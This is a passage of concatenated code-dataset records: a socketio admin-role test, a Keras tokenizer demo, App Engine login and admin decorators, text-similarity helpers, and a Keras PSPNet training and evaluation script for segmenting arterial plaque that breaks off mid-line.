self.socketio.get_received()\n player = response[-1]['args'][0]['player']\n assert player['role']['id'] == role_id\n new_role_id = 1\n self.socketio.emit('admin_set_role', {\n \"admin_id\": admin_id,\n \"password\": \"password\",\n \"player_id\": player_id,\n \"role_id\": new_role_id,\n })\n response = self.socketio.get_received()\n player = response[-1]['args'][0]['player']\n assert player['role']['id'] == new_role_id\n","sub_path":"server/testing/sockets.py","file_name":"sockets.py","file_ext":"py","file_size_in_byte":8063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"581126682","text":"from keras.preprocessing.text import Tokenizer\r\n# 定義 3 份文件\r\ndocs = [\"Keras is an API designed for human beings, not machines.\",\r\n\t\t\"Easy to learn and easy to use.\" ,\r\n\t\t\"Keras makes it easy to turn models into products.\"]\r\n# 建立 Tokenizer\r\ntok = Tokenizer()\r\n# 執行文字資料預處理\r\ntok.fit_on_texts(docs)\r\n# 顯示摘要資訊\r\nprint(tok.document_count)\r\nprint(tok.word_counts)\r\nprint(tok.word_index)\r\nprint(tok.word_docs)","sub_path":"F9744/Keras/Ch13/Ch13_1_2.py","file_name":"Ch13_1_2.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"293044239","text":"\"\"\"\nA collection of decorators used for applying access\ncontrol to a handler method\n\"\"\"\n# third-party imports\nfrom google.appengine.api import users\n\n# local imports\nfrom nacelle.models.auth import AdminUser\nfrom nacelle.decorators.well_behaved import well_behaved\n\n\n@well_behaved\ndef login_required(func):\n\n \"\"\"\n Handler methods decorated with this function will\n be restricted to logged in users only\n \"\"\"\n\n def wrap(self, *args, **kwargs):\n\n # get current user object\n user = users.get_current_user()\n if user:\n # return method as normal if user logged in\n return func(self, *args, **kwargs)\n else:\n # redirect user to login page if not logged in\n self.redirect(users.create_login_url(self.request.uri))\n\n return wrap\n\n\n@well_behaved\ndef admin_required(func):\n\n \"\"\"\n Handler methods decorated with this function will\n be restricted to logged in admin users only\n \"\"\"\n\n def wrap(self, *args, **kwargs):\n\n # check if handler has been invoked by a task queue\n if 'X-AppEngine-TaskName' in self.request.headers:\n # allow access to handler\n return func(self, *args, **kwargs)\n\n # get current user object\n user = users.get_current_user()\n # get any configured AdminUser emails\n admin_emails = [u.email for u in AdminUser.all()]\n\n # check if user is logged in\n if user:\n # check if user is registered appengine admin\n if users.is_current_user_admin():\n return func(self, *args, **kwargs)\n # check if user is registered AdminUser\n elif user.email() in admin_emails:\n return func(self, *args, **kwargs)\n # otherwise abort with 403\n else:\n self.abort(403)\n else:\n # redirect user to login page\n self.redirect(users.create_login_url(self.request.uri))\n\n return wrap\n","sub_path":"nacelle/decorators/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"551258275","text":"import re\n\nimport nltk\nimport unidecode\n\nfrom util.metric import compute_jaccard_index\n\n\ndef compute_sentence_similarity(sentence1: str, sentence2: str) -> float:\n \"\"\"Compute the similarity using the Jaccard index on the BOW model of both sentences.\n\n Parameters\n ----------\n sentence1 : str\n The first sentence.\n sentence2 : str\n The second sentence.\n\n Returns\n -------\n The Jaccard index computed on the BOW of both sentences.\n \"\"\"\n bow1 = get_bow(sentence1)\n bow2 = get_bow(sentence2)\n return compute_jaccard_index(bow1, bow2)\n\n\ndef get_bow(sentence: str) -> set:\n \"\"\"Compute the Bag-of-Words (BOW) set of a sentence.\n\n Parameters\n ----------\n sentence : str\n Sentence to compute the Bag-of-Words representation for.\n\n Returns\n -------\n The set of unique cleaned words (cleaned by the clean_word method) found in the sentence with non-zero length.\n \"\"\"\n words = nltk.word_tokenize(sentence)\n return {clean_word(word) for word in words if len(clean_word(word)) > 0}\n\n\ndef clean_word(word: str) -> str:\n \"\"\"Clean a word: remove any non-alphabetic character of the lower-cased version of the word and remove any accents.\n\n Parameters\n ----------\n word : str\n Word to clean.\n\n Returns\n -------\n str\n Cleaned word.\n \"\"\"\n return re.sub(r'[^a-z]+', '', unidecode.unidecode(word).lower())\n\n\ndef word_to_hash(word: str, vocab_size: int) -> int:\n \"\"\"Compute a hash for a word.\n\n Parameters\n ----------\n word : str\n Word to compute the hash for.\n\n vocab_size : int\n The maximum number of words in the vocab.\n\n Returns\n -------\n int\n The hash such that 0 <= hash < vocab_size.\n \"\"\"\n cleaned_word = clean_word(word)\n hash_sum = 0\n for i, char in enumerate(list(cleaned_word)):\n # A large prime number is used for better pseudo-randomness approximation\n hash_sum += (i * ord(char) * 104729) % vocab_size\n hash_sum = hash_sum % vocab_size\n return hash_sum\n\n\ndef levenshtein(seq1, seq2):\n \"\"\"Compute the edit distance between two words seq1 and seq2.\n\n Parameters\n ----------\n seq1 : str\n The first word.\n seq2 : str\n The second word.\n\n Returns\n -------\n int\n The edit distance.\n \"\"\"\n if len(seq1) < len(seq2):\n return levenshtein(seq2, seq1)\n\n previous_row = range(len(seq2) + 1)\n for i, c1 in enumerate(seq1):\n current_row = [i + 1]\n for j, c2 in enumerate(seq2):\n insertions = previous_row[\n j + 1] + 1\n deletions = current_row[j] + 1\n substitutions = previous_row[j] + (c1 != c2)\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n\n return previous_row[-1]\n\n\ndef compute_levenshtein_score(w1, w2):\n \"\"\"Compute a score based on the edit distance for two words w1 and w2.\n\n Parameters\n ----------\n w1 : str\n The first word.\n w2 : str\n The second word.\n\n Returns\n -------\n float\n 0.0 if either w1 is empty or w2 is empty.\n 1.0 - levenshtein(w1, w2) / max_possible such that identical words have score 1.0 and completely dissimilar\n words have score 0.0.\n \"\"\"\n if min(len(w1), len(w2)) == 0:\n return 0.\n max_levenshtein = max(len(w1), len(w2))\n return 1. - levenshtein(unidecode.unidecode(w1.lower()), unidecode.unidecode(w2.lower())) / float(max_levenshtein)\n","sub_path":"util/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"255733190","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n########################################################################\n## \n## PSPNet の Keras による実装 WIP\n## \n## 参考:\n## - https://arxiv.org/pdf/1612.01105.pdf\n## - image-segmentation-keras\n## - https://github.com/yutaroyamanaka/semantic-segmentation/blob/master/pspnet/model.py\n## https://tarovel4842.hatenablog.com/entry/2019/11/15/180322\n## \n## imgaug でデータ拡張\n## https://imgaug.readthedocs.io/en/latest/source/examples_segmentation_maps.html\n## \n########################################################################\n\nimport os\nimport sys\nimport random\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\" # 使用するGPU番号\n\nimport numpy as np\nimport keras\nfrom keras.models import *\nfrom keras.layers import *\nfrom keras.callbacks import *\nimport keras.backend as K\n\nfrom tqdm import tqdm\n\nimport cv2\nimport itertools\nimport imgaug as ia\nimport imgaug.augmenters as iaa\nfrom imgaug.augmentables.segmaps import SegmentationMapsOnImage\nia.seed(1)\n\n\nclass PSPNetFactory:\n \n def __init__(self):\n self\n\n def conv_block(self, input_tensor, kernel_size, filters, stage, block, strides=(2, 2)):\n\n filters1, filters2, filters3 = filters\n\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n x = Conv2D(filters=filters1, kernel_size=(1, 1), strides=strides, name=conv_name_base + '2a')(input_tensor)\n x = BatchNormalization(axis=3, name=bn_name_base + '2a')(x)\n x = Activation(activation='relu')(x)\n\n x = Conv2D(filters=filters2, kernel_size=kernel_size, padding='same', name=conv_name_base + '2b')(x)\n x = BatchNormalization(axis=3, name=bn_name_base + '2b')(x)\n x = Activation(activation='relu')(x)\n\n x = Conv2D(filters=filters3, kernel_size=(1, 1), name=conv_name_base + '2c')(x)\n x = BatchNormalization(axis=3, name=bn_name_base + '2c')(x)\n\n shortcut = Conv2D(filters=filters3, kernel_size=(1, 1), strides=strides, name=conv_name_base + '1')(input_tensor)\n shortcut = BatchNormalization(axis=3, name=bn_name_base + '1')(shortcut)\n\n x = add(inputs=[x, shortcut])\n x = Activation(activation='relu')(x)\n return x\n\n def identity_block(self, input_tensor, kernel_size, filters, stage, block):\n\n filters1, filters2, filters3 = filters\n\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n x = Conv2D(filters=filters1, kernel_size=(1, 1), name=conv_name_base + '2a')(input_tensor)\n x = BatchNormalization(axis=3, name=bn_name_base + '2a')(x)\n x = Activation(activation='relu')(x)\n\n x = Conv2D(filters=filters2, kernel_size=kernel_size, padding='same', name=conv_name_base + '2b')(x)\n x = BatchNormalization(axis=3, name=bn_name_base + '2b')(x)\n x = Activation(activation='relu')(x)\n\n x = Conv2D(filters=filters3, kernel_size=(1, 1), name=conv_name_base + '2c')(x)\n x = BatchNormalization(axis=3, name=bn_name_base + '2c')(x)\n\n x = add(inputs=[x, input_tensor])\n x = Activation(activation='relu')(x)\n return x\n\n def pool_block(self, feats, pool_factor):\n\n h = K.int_shape(feats)[1]\n w = K.int_shape(feats)[2]\n\n pool_size = strides = [\n int(np.round(float(h) / pool_factor)),\n int(np.round(float(w) / pool_factor))]\n\n x = AveragePooling2D(pool_size=pool_size, strides=strides, padding='same')(feats)\n x = Conv2D(filters=512, kernel_size=(1, 1), padding='same', use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Activation(activation='relu')(x)\n\n x = self.resize_image(input=x, factors=strides)\n return x\n\n def resize_image(self, input, factors):\n return Lambda(lambda x: K.resize_images(x=x,\n height_factor=factors[0],\n width_factor=factors[1],\n data_format='channels_last',\n interpolation='bilinear'))(input)\n\n def pyramid_pooling_module(self, input, pool_factors=[1, 2, 3, 6]):\n pool_outs = [input]\n\n for p in pool_factors:\n pooled = self.pool_block(input, p)\n pool_outs.append(pooled)\n\n o = Concatenate(axis = -1)(pool_outs)\n return o\n\n def create(self, input_height, input_width, n_classes, with_auxiliary_loss=True):\n\n assert input_height % 32 == 0\n assert input_width % 32 == 0\n\n input_shape = (input_height, input_width, 3)\n\n input = Input(shape = input_shape)\n \n # build basic ResNet50 structure\n\n x = ZeroPadding2D(padding=(3, 3))(input)\n x = Conv2D(filters=64, kernel_size=(7, 7), strides=(2, 2), name='conv1')(x) # 1/2\n # f1 = x\n\n x = BatchNormalization(axis=3, name='bn_conv1')(x)\n x = Activation(activation='relu')(x)\n x = MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(x) # 1/4\n\n x = self.conv_block(x, kernel_size=3, filters=[64, 64, 256], stage=2, block='a', strides=(1, 1))\n x = self.identity_block(x, kernel_size=3, filters=[64, 64, 256], stage=2, block='b')\n x = self.identity_block(x, kernel_size=3, filters=[64, 64, 256], stage=2, block='c')\n # f2 = one_side_pad(x)\n\n x = self.conv_block(x, kernel_size=3, filters=[128, 128, 512], stage=3, block='a') # 1/8\n x = self.identity_block(x, kernel_size=3, filters=[128, 128, 512], stage=3, block='b')\n x = self.identity_block(x, kernel_size=3, filters=[128, 128, 512], stage=3, block='c')\n x = self.identity_block(x, kernel_size=3, filters=[128, 128, 512], stage=3, block='d')\n # f3 = x\n\n x = self.conv_block(x, kernel_size=3, filters=[256, 256, 1024], stage=4, block='a') # 1/16\n x = self.identity_block(x, kernel_size=3, filters=[256, 256, 1024], stage=4, block='b')\n x = self.identity_block(x, kernel_size=3, filters=[256, 256, 1024], stage=4, block='c')\n x = self.identity_block(x, kernel_size=3, filters=[256, 256, 1024], stage=4, block='d')\n x = self.identity_block(x, kernel_size=3, filters=[256, 256, 1024], stage=4, block='e')\n x = self.identity_block(x, kernel_size=3, filters=[256, 256, 1024], stage=4, block='f')\n f4 = x\n\n x = self.conv_block(x, kernel_size=3, filters=[512, 512, 2048], stage=5, block='a') # 1/32\n x = self.identity_block(x, kernel_size=3, filters=[512, 512, 2048], stage=5, block='b')\n x = self.identity_block(x, kernel_size=3, filters=[512, 512, 2048], stage=5, block='c')\n f5 = x\n\n # Pyramid Pooling Module\n x = self.pyramid_pooling_module(input=f5, pool_factors=[1, 2, 3, 6])\n\n # main branch : Prediction Layers\n x = Conv2D(filters=512, kernel_size=(1, 1), use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Activation(activation='relu')(x)\n x = Conv2D(filters=n_classes, kernel_size=(3, 3), padding='same')(x)\n x = self.resize_image(input=x, factors=(32, 32)) # 1/1\n\n if with_auxiliary_loss:\n # sub branch for auxiliary loss feedback\n aux = f4\n # aux = self.pyramid_pooling_module(input=aux, pool_factors=[1, 2, 3, 6])\n # ここにも Pyramid Pooling Module いるのかなぁと思ったけど、この実装では入ってない。\n # https://github.com/hszhao/semseg/blob/master/model/pspnet.py\n aux = Conv2D(filters=256, kernel_size=(1, 1), use_bias=False)(aux)\n aux = BatchNormalization()(aux)\n aux = Activation(activation='relu')(aux)\n aux = Conv2D(filters=n_classes, kernel_size=(3, 3), padding='same')(aux)\n aux = self.resize_image(input=aux, factors=(16, 16)) # 1/1\n else:\n aux = None\n\n return self.get_segmentation_model(input=input, output=x, aux_output=aux)\n\n\n def get_segmentation_model(self, input, output, aux_output=None):\n\n o = output\n\n o_shape = Model(input, o).output_shape\n i_shape = Model(input, o).input_shape\n\n output_height = o_shape[1]\n output_width = o_shape[2]\n input_height = i_shape[1]\n input_width = i_shape[2]\n n_classes = o_shape[3]\n\n print(\"Input : {} x {}\".format(input_height, input_width))\n print(\"Output : {} x {}\".format(output_height, output_width))\n\n o = Reshape(target_shape=(output_height*output_width, -1))(o)\n o = Activation(activation='softmax')(o)\n\n if aux_output != None:\n aux_o_shape = Model(input, aux_output).output_shape\n assert output_height == aux_o_shape[1]\n assert output_width == aux_o_shape[2]\n\n o_aux = Reshape(target_shape=(output_height*output_width, -1))(aux_output)\n o_aux = Activation(activation='softmax')(o_aux)\n model_output =[o, o_aux]\n else:\n model_output =[o]\n\n # for training\n model = Model(input, model_output)\n model.output_width = output_width\n model.output_height = output_height\n model.n_classes = n_classes\n model.input_height = input_height\n model.input_width = input_width\n model.model_name = \"pspnet\"\n\n return model\n\nclass Segmentation:\n\n def __init__(self, model):\n self.model = model\n\n def get_pairs_from_paths(self, images_path, segs_path):\n\n ACCEPTABLE_IMAGE_FORMATS = [\".jpg\", \".png\"]\n ACCEPTABLE_SEGMENTATION_FORMATS = [\".png\"]\n\n image_files = []\n segmentation_files = {}\n\n for dir_entry in os.listdir(images_path):\n if os.path.isfile(os.path.join(images_path, dir_entry)) and \\\n os.path.splitext(dir_entry)[1] in ACCEPTABLE_IMAGE_FORMATS:\n file_name, file_extension = os.path.splitext(dir_entry)\n image_files.append((file_name, file_extension,\n os.path.join(images_path, dir_entry)))\n\n for dir_entry in os.listdir(segs_path):\n if os.path.isfile(os.path.join(segs_path, dir_entry)) and \\\n os.path.splitext(dir_entry)[1] in ACCEPTABLE_SEGMENTATION_FORMATS:\n file_name, file_extension = os.path.splitext(dir_entry)\n full_dir_entry = os.path.join(segs_path, dir_entry)\n segmentation_files[file_name] = (file_extension, full_dir_entry)\n\n return_value = []\n for image_file, _, image_full_path in image_files:\n if image_file in segmentation_files:\n return_value.append((image_full_path,\n segmentation_files[image_file][1]))\n\n return return_value\n\n\n def image_segmentation_generator(self, images_path, segs_path, batch_size,\n n_classes, input_height, input_width,\n output_height, output_width, \n augument_image=True, \n with_auxiliary_loss=True):\n\n img_seg_pairs = self.get_pairs_from_paths(images_path, segs_path)\n random.shuffle(img_seg_pairs)\n zipped = itertools.cycle(img_seg_pairs)\n\n # https://imgaug.readthedocs.io/en/latest/source/api_augmenters_meta.html#imgaug.augmenters.meta.Sequential\n seq = iaa.Sequential([\n # https://imgaug.readthedocs.io/en/latest/source/overview/flip.html\n iaa.Fliplr(0.5), # 水平反転を 50% の確率で適用\n iaa.Flipud(0.5), # 垂直反転を 50% の確率で適用\n # https://imgaug.readthedocs.io/en/latest/source/overview/size.html#cropandpad\n iaa.Sometimes(0.5, iaa.CropAndPad(\n percent=(-0.1, 0.1), # 各辺ランダムに 10% 切り詰め(クロッピング) 〜 10% 埋め足し(パディング)\n pad_mode='constant', # パディング色は値指定\n pad_cval=0 # パディング色の値は 0(黒)\n # keep_size=False がないので元のサイズにリサイズされる\n )),\n # https://imgaug.readthedocs.io/en/latest/source/overview/geometric.html#affine\n # https://imgaug.readthedocs.io/en/latest/source/api_augmenters_geometric.html#imgaug.augmenters.geometric.Affine\n iaa.Sometimes(0.5, iaa.Affine(\n scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)}, # 縦横に各 80% 〜 120% のリサイズ\n translate_percent={\"x\": (-0.2, 0.2), \"y\": (-0.2, 0.2)}, # 縦横に各 -20% 〜 20% の移動\n rotate=(-45, 45), # 回転角度は -45度 〜 +45度\n shear=(-16, 16), # シアー角度は -16度 〜 +16度\n order=[0, 1], # 補完方式は Nearest-neighbor か Bi-linear (ランダムに選択)\n cval=0, # 背景色の値は 0(黒)\n mode='constant' # 背景色は値指定\n )),\n ], random_order=True) # 適用順序はランダム\n\n while True:\n X = []\n Y = []\n for _ in range(batch_size):\n im, seg = next(zipped)\n\n im = cv2.imread(im, 1)\n seg = cv2.imread(seg, 1)\n\n if augument_image:\n # データ拡張\n aug_det = seq.to_deterministic()\n image_aug = aug_det.augment_image(im)\n segmap = ia.SegmentationMapsOnImage(seg, shape=im.shape)\n segmap_aug = aug_det.augment_segmentation_maps(segmap)\n segmap_aug = segmap_aug.get_arr()\n \n im = image_aug\n seg = segmap_aug\n\n X.append(self.get_image_array(im, input_width, input_height))\n Y.append(self.get_segmentation_array(seg, n_classes, output_width, output_height))\n\n if with_auxiliary_loss:\n yield np.array(X), [np.array(Y), np.array(Y)]\n else:\n yield np.array(X), [np.array(Y)]\n\n\n def get_image_array(self, image_input, width, height):\n\n if type(image_input) is np.ndarray:\n img = image_input\n else:\n img = cv2.imread(image_input, 1)\n\n img = cv2.resize(img, (width, height))\n img = img.astype(np.float32)\n img = img/255.0\n\n return img\n\n\n def get_segmentation_array(self, image_input, nClasses, width, height, no_reshape=False):\n \"\"\" Load segmentation array from input \"\"\"\n\n seg_labels = np.zeros((height, width, nClasses))\n\n if type(image_input) is np.ndarray:\n img = image_input\n else:\n img = cv2.imread(image_input, 1)\n\n img = cv2.resize(img, (width, height), interpolation=cv2.INTER_NEAREST)\n img = img[:, :, 0]\n\n for c in range(nClasses):\n seg_labels[:, :, c] = (img == c).astype(int)\n\n if not no_reshape:\n seg_labels = np.reshape(seg_labels, (width*height, nClasses))\n\n return seg_labels\n\n def predict(self, image_input):\n model = self.model\n\n output_width = model.output_width\n output_height = model.output_height\n input_width = model.input_width\n input_height = model.input_height\n n_classes = model.n_classes\n\n x = self.get_image_array(image_input=image_input, width=input_width, height=input_height)\n x = np.array([x])\n o = model.predict(x, batch_size=None, verbose=0, steps=None)\n \n if len(o) == 2:\n o = o[0]\n\n # print(o.shape) # -> (1, 331776, 7)\n result = o[0]\n # print(result.shape) # -> (331776, 7)\n\n pr = result.reshape((output_height, output_width, n_classes))\n # print(pr.shape) # -> (576, 576, 7)\n\n return pr\n\n\n def evaluate(self, test_images, test_annotations, bootstrap_repeats=None, print_each=False):\n model = self.model\n\n def mean_confidence_interval(a, confidence=0.95):\n n = len(a)\n m, se = np.mean(a), scipy.stats.sem(a)\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\n return m, m-h, m+h\n \n paths = self.get_pairs_from_paths(test_images, test_annotations)\n paths = list(zip(*paths))\n inp_images = list(paths[0])\n annotations = list(paths[1])\n\n if print_each:\n print('== 各画像・各クラスに対する I, U, gt ==')\n print(\"data-id\", end='')\n for i in range(model.n_classes) :\n print(\"\\t{}_i\\t{}_u\\t{}_gt\".format(i,i,i), end='')\n print()\n\n z = []\n for inp, ann, path in zip(inp_images, annotations, paths[0]):\n # 推論結果\n pr = self.predict(inp)\n pr = pr.argmax(axis=2)\n pr = pr.flatten()\n\n # 正解 ground truth\n gt = self.get_segmentation_array(image_input=ann, \n nClasses=model.n_classes,\n width=model.output_width,\n height=model.output_height,\n no_reshape=True)\n gt = gt.argmax(-1)\n gt = gt.flatten()\n\n # 領域の計算(計算量が大きい部分)\n tp = np.zeros(model.n_classes) # true positive\n fp = np.zeros(model.n_classes) # false positive\n fn = np.zeros(model.n_classes) # false negative\n n_pixels = np.zeros(model.n_classes)\n for cl_i in range(model.n_classes):\n tp[cl_i] += np.sum((pr == cl_i) * (gt == cl_i))\n fp[cl_i] += np.sum((pr == cl_i) * ((gt != cl_i)))\n fn[cl_i] += np.sum((pr != cl_i) * ((gt == cl_i)))\n n_pixels[cl_i] += np.sum(gt == cl_i)\n z.append((tp, fp, fn, n_pixels))\n\n if print_each:\n print(os.path.basename(path), end='')\n _union = tp + fp + fn\n for i in range(model.n_classes) :\n print(\"\\t{:.0f}\\t{:.0f}\\t{:.0f}\".format(tp[i], _union[i], n_pixels[i]), end='')\n print()\n print()\n\n tp = np.zeros(model.n_classes) # true positive\n fp = np.zeros(model.n_classes) # false positive\n fn = np.zeros(model.n_classes) # false negative\n n_pixels = np.zeros(model.n_classes)\n for _tp, _fp, _fn, _n_pixels in z:\n for i in range(model.n_classes):\n tp[i] += _tp[i]\n fp[i] += _fp[i]\n fn[i] += _fn[i]\n n_pixels[i] += _n_pixels[i]\n \n precision = tp / (tp + fp)\n recall = tp / (tp + fn)\n\n print('== IoU ==')\n cl_wise_score = tp / (tp + fp + fn + 0.000000000001) # intersection over union\n n_pixels_norm = n_pixels / np.sum(n_pixels)\n frequency_weighted_IU = np.sum(cl_wise_score*n_pixels_norm)\n mean_IU = np.mean(cl_wise_score)\n \n for i in range(model.n_classes) :\n print(\"class_{}:\\t{:.4f}\".format(i, cl_wise_score[i]))\n print(\"mean:\\t{:.4f}\".format(mean_IU))\n print(\"frequency_weighted:\\t{:.4f}\".format(frequency_weighted_IU))\n print()\n\n if bootstrap_repeats != None:\n print('== IoU のブートストラップ平均と 95% パーセンタイル区間 ==')\n _mean = []\n _freq = []\n _clsw = [[] for i in range(model.n_classes)] \n for i in tqdm(np.arange(bootstrap_repeats)):\n \n tp = np.zeros(model.n_classes)\n fp = np.zeros(model.n_classes)\n fn = np.zeros(model.n_classes)\n n_pixels = np.zeros(model.n_classes)\n for idx in np.random.choice(len(z), len(z), replace=True):\n _tp, _fp, _fn, _n_pixels = z[idx]\n tp += _tp\n fp += _fp\n fn += _fn\n n_pixels += _n_pixels\n\n cl_wise_score = tp / (tp + fp + fn + 0.000000000001) # intersection over union\n n_pixels_norm = n_pixels / np.sum(n_pixels)\n frequency_weighted_IU = np.sum(cl_wise_score*n_pixels_norm)\n mean_IU = np.mean(cl_wise_score)\n\n _mean.append(mean_IU)\n _freq.append(frequency_weighted_IU)\n for i in range(model.n_classes) :\n _clsw[i].append(cl_wise_score[i])\n\n for i in range(model.n_classes) :\n _m, _l, _h = mean_confidence_interval(np.array(_clsw[i]))\n print(\"class_{}:\\t{:.4f}\\t{:.4f}\\t{:.4f}\".format(i, _m, _l, _h))\n _m, _l, _h = mean_confidence_interval(np.array(_mean))\n print(\"mean:\\t{:.4f}\\t{:.4f}\\t{:.4f}\".format(_m, _l, _h))\n _m, _l, _h = mean_confidence_interval(np.array(_freq))\n print(\"frequency_weighted:\\t{:.4f}\\t{:.4f}\\t{:.4f}\".format(_m, _l, _h))\n print()\n\n print('== Precision, Recall, F-score ==')\n f_score = 2 / ((1/precision) + (1/recall))\n print(\"cls#\\tPrecision\\tRecall\\tF-score\")\n for i in range(model.n_classes):\n print(\"class_{}:\\t{:.4f}\\t{:.4f}\\t{:.4f}\".format(\n i,\n precision[i],\n recall[i],\n f_score[i]))\n print(\"mean:\\t{:.4f}\\t{:.4f}\\t{:.4f}\".format(\n np.mean(precision),\n np.mean(recall),\n np.mean(f_score),\n ))\n print(\"frequency_weighted:\\t{:.4f}\\t{:.4f}\\t{:.4f}\".format(\n np.sum(precision * n_pixels_norm),\n np.sum(recall * n_pixels_norm),\n np.sum(f_score * n_pixels_norm),\n ))\n return\n\n\n def train(self,\n input_height,\n input_width,\n n_classes,\n train_images,\n train_annotations,\n val_images,\n val_annotations,\n checkpoints_path,\n epochs=5,\n batch_size=2,\n val_batch_size=2, \n steps_per_epoch=512,\n val_steps_per_epoch=512,\n optimizer_name='adadelta',\n aux_loss_weight = 0.4):\n\n model = self.model\n\n output_height = model.output_height\n output_width = model.output_width\n\n if aux_loss_weight == None:\n with_auxiliary_loss = False\n model.compile(\n loss=['categorical_crossentropy'],\n optimizer=optimizer_name, \n metrics=[\n 'accuracy', \n # keras.metrics.MeanIoU(num_classes=n_classes), # requires TF 2.0.0 or later\n ])\n else:\n assert aux_loss_weight < 1.0\n assert aux_loss_weight >= 0.0\n with_auxiliary_loss = True\n model.compile(\n loss=['categorical_crossentropy', 'categorical_crossentropy'], \n loss_weights=[1.0 - aux_loss_weight, aux_loss_weight],\n optimizer=optimizer_name, \n metrics=['accuracy', keras.metrics.MeanIoU(num_classes=n_classes)])\n\n train_gen = self.image_segmentation_generator(\n train_images, train_annotations, batch_size, n_classes,\n input_height, input_width, output_height, output_width, \n augument_image=True,\n with_auxiliary_loss=with_auxiliary_loss)\n\n val_gen = self.image_segmentation_generator(\n val_images, val_annotations, val_batch_size, n_classes, \n input_height, input_width, output_height, output_width, \n augument_image=False,\n with_auxiliary_loss=with_auxiliary_loss)\n\n callbacks = [\n ModelCheckpoint(filepath=checkpoints_path+'/model.{epoch:02d}-{val_loss:.2f}.hdf5')\n ]\n\n os.makedirs(checkpoints_path, exist_ok=True)\n\n model.fit_generator(generator=train_gen,\n steps_per_epoch=steps_per_epoch,\n validation_data=val_gen,\n validation_steps=val_steps_per_epoch,\n epochs=epochs, \n callbacks=callbacks,\n use_multiprocessing=False)\n\nimport numpy as np\nimport scipy.stats\n\n\n\n\nhelp = \"\"\"\nUsage: pspnet-4class.py train\nUsage: pspnet-4class.py predict weights_file output_suffix\nUsage: pspnet-4class.py evaluate weights_file bootstrap_repeats\n\"\"\"\n\n\nif __name__ == \"__main__\":\n\n args = sys.argv\n if len(args) < 2 : exit(help)\n\n input_height = 576\n input_width = 576\n n_classes = 5 # 4 + background\n dataset_base_dir = \"./dataset\"\n\n epoches = 200\n batch_size = 10\n steps_per_epoch = 1000\n val_batch_size = 2\n val_steps_per_epoch = 112 / val_batch_size # number of test images = 112\n\n checkpoints_path = 'checkpoints'\n with_auxiliary_loss = False\n aux_loss_weight = None #0.4\n\n model = PSPNetFactory().create(\n input_height=input_height, \n input_width=input_width, \n n_classes=n_classes, \n with_auxiliary_loss=with_auxiliary_loss)\n \n model.summary()\n\n command = args[1]\n if command == 'train' :\n\n if len(args) > 2:\n weights_file = args[2]\n model.load_weights(weights_file)\n\n segmentation = Segmentation(model)\n segmentation.train(\n input_height = input_height, \n input_width = input_width, \n n_classes = n_classes,\n train_images = dataset_base_dir + \"/train_images/\",\n train_annotations = dataset_base_dir + \"/train_annotations/\",\n val_images = dataset_base_dir + \"/val_images/\",\n val_annotations = dataset_base_dir + \"/val_annotations/\",\n checkpoints_path = checkpoints_path,\n epochs = epoches,\n batch_size = batch_size,\n val_batch_size = val_batch_size,\n steps_per_epoch = steps_per_epoch,\n val_steps_per_epoch = val_steps_per_epoch,\n aux_loss_weight = aux_loss_weight)\n\n elif command == 'evaluate' :\n\n if len(args) < 3 : exit(help)\n \n weights_file = args[2]\n\n if len(args) > 3:\n bootstrap_repeats = int(args[3])\n else:\n bootstrap_repeats = None\n \n model.load_weights(weights_file)\n segmentation = Segmentation(model)\n print()\n print(\"for テストデータセット\")\n segmentation.evaluate(\n test_images = dataset_base_dir + '/test_images/', \n test_annotations = dataset_base_dir + '/test_annotations/',\n bootstrap_repeats = bootstrap_repeats)\n print()\n print(\"for バリデーションデータセット\")\n segmentation.evaluate(\n test_images = dataset_base_dir + '/val_images/', \n test_annotations = dataset_base_dir + '/val_annotations/',\n bootstrap_repeats = bootstrap_repeats)\n print()\n print(\"for トレーニングデータセット\")\n segmentation.evaluate(\n test_images = dataset_base_dir + '/train_images/', \n test_annotations = dataset_base_dir + '/train_annotations/',\n bootstrap_repeats = bootstrap_repeats)\n \n elif command == 'predict' :\n\n if len(args) < 4 : exit(help)\n\n weights_file = args[2]\n output_suffix = args[3]\n\n model.load_weights(weights_file)\n segmentation = Segmentation(model)\n\n labels = {\n 0: \"Background\",\n 1: \"Fibrocalcific plaque\",\n 2: \"Fibrous cap atheroma / TCFA\",\n 3: \"Healed erosion/rupture\",\n 4: \"Intimal xanthoma / Pathological intimal thickening\",\n }\n colors = {\n 0: (0, 000, 000), # 黒\n 1: (1, 000, 255), # 赤\n 2: (2, 127, 255), # オレンジ\n 3: (3, 255, 255), # 黄\n 4: (5, 255, 000), # 緑\n }\n\n os.makedirs(os.path.join(dataset_base_dir, 'test_predict'), exist_ok=True)\n\n for name in os.listdir(os.path.join(dataset_base_dir, 'test_images')):\n image_input_path = os.path.join(dataset_base_dir, 'test_images', name)\n\n if os.path.isfile(image_input_path) != True:\n continue\n if os.path.splitext(name)[1] != '.png':\n continue\n\n print(image_input_path)\n\n pr = segmentation.predict(image_input=image_input_path)\n # print(pr.shape) # -> (576, 576, 5)\n pr_height = pr.shape[0]\n pr_width = pr.shape[1]\n\n for i in range(n_classes):\n # v = pr[:,:,i]\n # print(\"{} : {:.6f} ({})\".format(i, np.max(v), labels[i]))\n img = np.zeros((pr_height, pr_width, 3))\n b, g, r = colors[i]\n img[:,:,0] = pr[:,:,i] * b\n img[:,:,1] = pr[:,:,i] * g\n img[:,:,2] = pr[:,:,i] * r\n filename = os.path.join(dataset_base_dir, 